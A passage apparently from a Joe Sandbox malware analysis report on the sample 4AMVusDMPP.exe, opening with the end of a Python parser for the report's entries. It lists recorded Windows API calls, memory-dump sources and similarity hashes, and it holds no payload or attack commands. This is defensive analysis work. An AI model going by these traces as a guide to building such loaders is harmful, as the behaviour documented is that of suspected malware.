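            out.append([n for v, n in LOADLIB_FLAGS.items() if c.args[2] & v])
    return out

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(hex(e.image_base), e.api_string_id, sorted(e.api_names()))
```

On the constructed input the first entry decodes its LoadLibraryExW flag 00000008 as LOAD_WITH_ALTERED_SEARCH_PATH, which is the flag used when a library is loaded by the full path that the preceding GetSystemDirectoryW/wsprintfW pair builds; the `?` placeholders the report prints for arguments it could not recover are kept as None rather than guessed.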
APIs
• GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4AMVusDMPP.exe,80000000,00000003), ref: 00405EE2
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
• Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
• Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
• Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
• GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
Memory Dump Source
• Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
• Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
• Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
• Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                          APIs
                                                          • EnumWindows.USER32(00000000), ref: 6EAB2B6B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: EnumWindows
                                                          • String ID:
                                                          • API String ID: 1129996299-0
                                                          APIs
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          APIs
                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          APIs
                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004128C8,0040CED0,004033DE,0040CED0,004128C8,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(6EAB505C,00000004,00000040,6EAB504C), ref: 6EAB29B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,6EAB123B,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB1225
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                          • GetClientRect.USER32(?,?), ref: 00405639
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                          • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                            • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                          • ShowWindow.USER32(00000000), ref: 00405788
                                                          • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                          • ShowWindow.USER32(00000008), ref: 004057D7
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                          • CreatePopupMenu.USER32 ref: 0040581C
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                          • GetWindowRect.USER32(?,?), ref: 00405850
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                          • OpenClipboard.USER32(00000000), ref: 004058B1
                                                          • EmptyClipboard.USER32 ref: 004058B7
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                          • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                          • CloseClipboard.USER32 ref: 00405912
                                                           Memory Dump Source
                                                           • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: (7B${
                                                          • API String ID: 590372296-525222780
                                                          • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                          • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                          • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                          • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                            • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                            • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                            • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                            • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                            • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                           Memory Dump Source
                                                           • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$A$Call
                                                          • API String ID: 2624150263-413618503
                                                          • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                          • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                          • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                          • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                          APIs
                                                            • Part of subcall function 6EAB121B: GlobalAlloc.KERNELBASE(00000040,?,6EAB123B,?,6EAB12DF,00000019,6EAB11BE,-000000A0), ref: 6EAB1225
                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6EAB1C6B
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 6EAB1CB3
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 6EAB1CBD
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1CD0
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1DB2
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1DB7
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1DBC
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1FA6
                                                          • lstrcpyW.KERNEL32(?,?), ref: 6EAB2140
                                                          • GetModuleHandleW.KERNEL32(00000008), ref: 6EAB21B5
                                                          • LoadLibraryW.KERNEL32(00000008), ref: 6EAB21C6
                                                          • GetProcAddress.KERNEL32(?,?), ref: 6EAB2220
                                                          • lstrlenW.KERNEL32(00000808), ref: 6EAB223A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                           • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: f5388446ecbb61c6940b0a72562bf5393f302ed00ea0195cd3397a5e3ecb1724
                                                          • Instruction ID: 12e7e84035b6bb8cc696186d95a3c979594dcdc7f2da310211a7ea3a6c3d1715
                                                          • Opcode Fuzzy Hash: f5388446ecbb61c6940b0a72562bf5393f302ed00ea0195cd3397a5e3ecb1724
                                                          • Instruction Fuzzy Hash: 54229871D2420ADEDB508FE9C4846FABBF8FF16305F20452AD1A5E7280D7745AC9CB68
                                                          APIs
                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID:
                                                          • API String ID: 542301482-0
                                                          • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                          • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                          • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                          • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                          • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                          • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                          • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                          • GetSysColor.USER32(?), ref: 004045FE
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                          • lstrlenW.KERNEL32(?), ref: 0040461F
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                          • SendMessageW.USER32(00000000), ref: 004046A1
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                          • SetCursor.USER32(00000000), ref: 00404720
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                          • SetCursor.USER32(00000000), ref: 0040473C
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                           Memory Dump Source
                                                           • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: Call$N
                                                          • API String ID: 3103080414-3438112850
                                                          • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                          • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                           Memory Dump Source
                                                           • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
